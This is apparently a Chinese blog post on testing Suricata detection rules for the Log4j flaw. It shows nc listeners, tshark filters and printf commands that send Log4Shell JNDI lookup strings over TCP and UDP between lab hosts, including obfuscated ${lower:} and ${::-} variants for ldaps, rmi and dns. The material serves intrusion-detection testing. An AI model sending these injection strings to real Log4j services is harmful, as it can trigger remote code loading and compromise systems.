编写log4j漏洞的suricata规则-测试(9004057-9004061)
1.测试规则(9004057-9004058)
1.主机B开启监听 nc -lkp 18080 >/dev/null 2.主机A发起请求 printf '${jndi:ldaps://10.10.10.1/a}\r\n' | nc 10.10.10.2 18080 printf '${jndi:ldaps://10.10.10.1/a}' | nc -u -w 1 10.10.10.2 5514 3.主机B分析捕获的测试流量 tshark -r log4j_jndi.pcap -Y 'udp && frame contains "jndi"' -T fields -e frame.number -e ip.src -e udp.srcport -e ip.dst -e udp.dstport -e udp.length -e udp.stream tshark -r log4j_jndi.pcap -Y 'tcp && frame contains "jndi"' -T fields -e frame.number -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e tcp.stream -e tcp.len -e tcp.payload
2.测试规则(9004059)
1.主机B开启监听 nc -lkp 18080 >/dev/null 2.主机A发起请求 printf '${${lower:j}ndi:${lower:r}mi://10.10.10.1/a}\r\n' | nc 10.10.10.2 18080 printf '${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://10.10.10.1/a}\r\n' | nc 10.10.10.2 18080 printf '${${::-j}${::-n}${::-d}${::-i}${::-:}${::-r}${::-m}${::-i}${::-:}${::-/}${::-/}10.10.10.1/a}\r\n' | nc 10.10.10.2 18080
3.测试规则(9004060)
1.主机B开启监听 nc -lkp 18080 >/dev/null 2.主机A发起请求 printf '${${lower:j}ndi:${lower:d}ns://10.10.10.1/a}\r\n' | nc 10.10.10.2 18080 printf '${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://10.10.10.1/a}\r\n' | nc 10.10.10.2 18080 printf '${${::-j}${::-n}${::-d}${::-i}${::-:}${::-d}${::-n}${::-s}${::-:}${::-/}${::-/}10.10.10.1/a}\r\n' | nc 10.10.10.2 18080
4.测试规则(9004061)
1.主机B开启监听 nc -lkp 18080 >/dev/null 2.主机A发起请求 printf '${${lower:j}ndi:${lower:l}daps://10.10.10.1/a}\r\n' | nc 10.10.10.2 18080 printf '${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}${::-s}://10.10.10.1/a}\r\n' | nc 10.10.10.2 18080 printf '${${::-j}${::-n}${::-d}${::-i}${::-:}${::-l}${::-d}${::-a}${::-p}${::-s}${::-:}${::-/}${::-/}10.10.10.1/a}\r\n' | nc 10.10.10.2 18080
浙公网安备 33010602011771号